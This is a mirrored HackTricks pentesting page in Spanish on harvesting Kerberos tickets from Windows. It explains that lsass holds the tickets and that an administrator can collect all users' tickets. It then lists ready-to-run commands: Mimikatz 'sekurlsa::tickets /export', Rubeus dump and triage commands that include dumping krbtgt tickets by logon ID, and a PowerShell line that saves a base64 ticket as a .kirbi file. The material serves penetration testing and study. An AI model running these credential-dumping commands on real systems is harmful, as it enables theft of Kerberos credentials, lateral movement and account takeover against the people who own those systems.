Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

4.3 KiB
Raw Blame History

Recopilación de tickets en Windows

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

En Windows, los tickets son manejados y almacenados por el proceso lsass (Local Security Authority Subsystem Service), que es responsable de la seguridad. Por lo tanto, para recuperar tickets de un sistema Windows, es necesario comunicarse con lsass y solicitarlos. Como usuario no administrativo solo se pueden obtener los tickets que se poseen, sin embargo, como administrador de la máquina, se pueden recopilar todos ellos. Para este propósito, se pueden utilizar las herramientas Mimikatz o Rubeus como se muestra a continuación:

# Using mimikatz
sekurlsa::tickets /export
# Using Rubeus
## Dump all tickets
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

## List all tickets
.\Rubeus.exe triage
## Dump the interesting one by luid
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

Esta información fue tomada de: https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥